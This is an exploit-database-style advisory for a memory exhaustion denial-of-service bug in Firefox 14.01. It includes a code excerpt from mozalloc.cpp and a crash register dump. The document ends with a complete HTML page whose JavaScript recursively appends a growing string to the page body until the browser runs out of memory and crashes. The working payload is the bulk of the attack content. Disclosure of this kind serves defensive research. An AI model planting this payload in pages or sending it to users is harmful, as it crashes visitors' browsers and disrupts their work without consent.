<!-- --------------------------------------------------- Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit --------------------------------------------------- Credit: Jean Pascal Pereira <[email protected]> Description: Mozilla Firefox is prone to a memory exhaustion vulnerability. The issue has been tested on Firefox 14.01, prior versions may also be affected. mozalloc.cpp, line 184: moz_xposix_memalign(void **ptr, size_t alignment, size_t size) { int err = posix_memalign(ptr, alignment, size); if (UNLIKELY(err && ENOMEM == err)) { mozalloc_handle_oom(); return moz_xposix_memalign(ptr, alignment, size); } // else: (0 == err) or (EINVAL == err) return err; } A crafted JavaScript leads the application to crash. Stacktrace (Windows 7 SP1): EAX 00000000 ECX 5D923896 MSVCR100.5D923896 EDX 00000003 EBX 7FB00000 UNICODE "xxxxxxxxx [...]" ESP 002BB7F8 EBP 002BB85C ESI 5D8D1EC6 MSVCR100.__p__iob EDI 5D92379C MSVCR100.fputs EIP 73FC1999 mozalloc.73FC1999 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(C000) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008) EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty 1.0000000000000000000 ST1 empty 0.1085754583206562651 ST2 empty -0.0696429635909516231 ST3 empty 86.763962149620056150 ST4 empty 31200.200000000000730 ST5 empty 1.3451474216221712500e+15 ST6 empty 1.0390856000000000000e+10 ST7 empty 0.0 3 2 1 0 E S P U O Z D I FST 0022 Cond 0 0 0 0 Err 0 0 1 0 0 0 1 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 --> <html> <head> <title></title> </head> <body></body> <script> function e(x) { document.body.innerHTML += x; e(x + 'x'); }; e('x') </script> </html>